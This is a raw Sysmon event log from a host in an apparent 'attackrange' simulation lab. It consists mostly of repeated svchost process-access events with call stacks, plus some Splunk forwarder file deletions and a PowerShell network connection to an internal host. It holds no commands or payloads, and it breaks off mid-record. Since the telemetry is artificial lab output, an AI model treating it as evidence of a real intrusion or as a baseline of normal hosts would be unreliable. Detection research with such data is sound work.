13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4770B160BEE7A5EA6C1CEB8E4213E27,SHA256=E7114BCC45ADE1FEB7BCB07B2B50FC8053A7A24CB26D3DF17200B381C59682C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:19.942{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=307099EC5E24521AB13B04963B58D6C1,SHA256=B59577DA7D2F34DC3F7C8A9D859FC86D609B957E8A954FA522BA03496119A65F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:48.694{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50484-false10.0.1.12-8000- 23542300x800000000000000036497019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:19.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5015425936AA4B6B9C369158F77BBDC4,SHA256=2EC04FFFCB9F801DAACFEE651A1DCA180B645174A79963CDC1ACE827A55993F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:20.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=383CEC8B14D46146890ABA53B3F43B11,SHA256=7B4D0BB2A5280AD5BFD853A237DAAE7E88B49E9625783563503BBD614CE1AB8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:50.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50485-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:21.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6290DF160C058383DB0D0D6B3140D893,SHA256=1D19DFE34344E6C7405B4ABE2B24AFC49A4E299BFA4F556EECE20E38BFE890C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:22.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0EDA51D75FCB939DA5173486629222,SHA256=9E09CE33E550D4AE03571D64B5922080C97DB3BA0ED126F24349B5B87DACBE54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:23.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B39D2C81E33C29A9507D7C0F1E550B6,SHA256=BDE2301A9F4195241BB1336D02A1F3C0C5493BEBD2A502CA8A2EAC3D1E3F5A0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:23.225{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C78E2D9E7FE3F8C3405156A7BBAC524A,SHA256=BA8E740E1E4A349767A71804088FA1BCBEEF07031921EF672269D9F8F5286941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program 